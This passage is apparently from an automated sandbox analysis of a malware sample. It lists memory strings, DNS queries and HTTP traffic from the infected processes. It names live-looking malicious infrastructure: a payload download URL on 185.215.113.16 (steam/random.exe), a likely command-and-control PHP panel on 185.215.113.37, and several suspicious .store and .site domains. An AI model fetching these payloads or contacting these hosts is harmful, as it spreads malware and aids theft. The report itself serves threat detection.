Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2891757977.000002EE5DD69000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2897777583.000002EE5E7DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2891757977.000002EE5DD69000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2940240377.000003948B000000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2897777583.000002EE5E77B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2900792770.000002EE5EA4D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2897777583.000002EE5E7FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic DNS traffic detected: DNS query: studennotediw.store
Source: global traffic DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic DNS traffic detected: DNS query: spirittunek.store
Source: global traffic DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 23 Oct 2024 15:51:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wtM56eXhMnYrQd7s5tljjhyYDp59tlPY85378oXOnHnArHng0NRJiloGTAmd1Vug9g2vU9SP9bad1zMCYK4iBRPWD32hWnuT5htBlm6QdF6AHsxXMEflkSV8uEKSlh1ekTSSQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d72e304da976994-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 23 Oct 2024 15:52:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yUL4Ojqz%2Fc60G%2FUC0hA3zMPZlKxhSUu2KxH%2BOF1WCo1KkEwF4URwFnY1Pwd7M9ne4xeQAdHSU8BMV1hf2iX3svW4MbDOQ%2BwV70378tQoS505VXwP%2BoSIo43E8mhB7d1Lk8tuQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d72e52c8fb5c871-DFW
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C96B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2848249080.000002EE4C96B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2910556312.000002EE5F541000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: file.exe, file.exe, 00000000.00000003.2358846258.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.2358846258.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/O
Source: file.exe, 00000000.00000003.2358846258.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Y
Source: file.exe, file.exe, 00000000.00000003.2358846258.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000003.2358846258.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/o=
Source: file.exe, 00000000.00000003.2358846258.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/p=
Source: file.exe String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: file.exe, 00000000.00000003.2358846258.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeI
Source: file.exe, 00000000.00000003.2358846258.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/y=
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, 7d61336cf8.exe, 0000000A.00000002.2635976470.000000000173E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp, 7d61336cf8.exe, 0000000A.00000002.2635976470.0000000001797000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, 7d61336cf8.exe, 0000000A.00000002.2635976470.000000000173E000.00000004.00000020.00020000.00000000.sdmp, 7d61336cf8.exe, 0000000A.00000002.2635976470.0000000001783000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.00000000017BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.000000000173E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php1G
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.00000000017BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.0000000001797000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpA
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.00000000017BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpb
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.0000000001797000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpd
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpft
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg#
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.00000000017BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.00000000017BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php~
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp, 7d61336cf8.exe, 0000000A.00000002.2635976470.0000000001797000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/ws
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.000000000173E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37Wz
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37o#
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E969000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2939387090.000002EE67103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E969000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2939387090.000002EE67103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E969000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2939387090.000002EE67103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E969000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2939387090.000002EE67103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: file.exe, 00000000.00000003.2214528755.000000000569D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2214528755.000000000569D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.inbox.lv/compose?to=%shttps://e.mail.ru
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: file.exe, 00000000.00000003.2214528755.000000000569D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2214528755.000000000569D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2214528755.000000000569D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2214528755.000000000569D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2214528755.000000000569D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001A.00000003.2792367692.000002EE5D97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C9B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64A6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2760500227.000002EE64A5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C4B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001A.00000002.2911859884.000002EE5FF8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2891757977.000002EE5DD69000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2852111919.000002EE582F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2917093566.000002EE604D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2929744715.000002EE64D38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2891757977.000002EE5DD26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64A53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2929744715.000002EE64D38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2929744715.000002EE64D38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001A.00000002.2850784469.000002EE5818A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001A.00000002.2850784469.000002EE5818A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001A.00000002.2850784469.000002EE5818A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2891757977.000002EE5DD12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2894551874.000002EE5DE93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2809099994.000002EE5DE91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001A.00000002.2913537647.000002EE6001A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2831640577.000002EE5DEDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2803357818.000002EE60384000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832627799.000002EE5DEDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2916133421.000002EE60396000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C918000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2799593917.000002EE5D6E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2928343018.000002EE64C7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2913537647.000002EE60096000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2860117948.000002EE59D34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2922188540.000002EE60698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2797346914.000002EE5DEDB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2940158821.000002F10003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2747136565.000002EE67167000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2799802921.000002EE5D2D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2739831324.000002EE64C7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2802263143.000002EE606D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2895552129.000002EE5E008000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2739831324.000002EE64C2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2902548767.000002EE5EB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2214528755.000000000569D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2214528755.000000000569D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001A.00000002.2903619697.000002EE5ED99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2767458060.000002EE5ED99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2928343018.000002EE64C8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2739831324.000002EE64C8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001A.00000002.2903619697.000002EE5ED99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2767458060.000002EE5ED99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2928343018.000002EE64C8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2739831324.000002EE64C8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.000000000179D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.000000000179D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.000000000179D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sCan
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttps://poczta.interia.pl/mh/?mailto=%sScheme
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001A.00000003.2747136565.000002EE67194000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2939387090.000002EE67194000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E969000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2939387090.000002EE67103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2764466936.000002EE5EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876758672.000002EE5CFC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2790981889.000002EE5E675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2878148995.000002EE5D103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2902828832.000002EE5ECDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2902828832.000002EE5EC4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 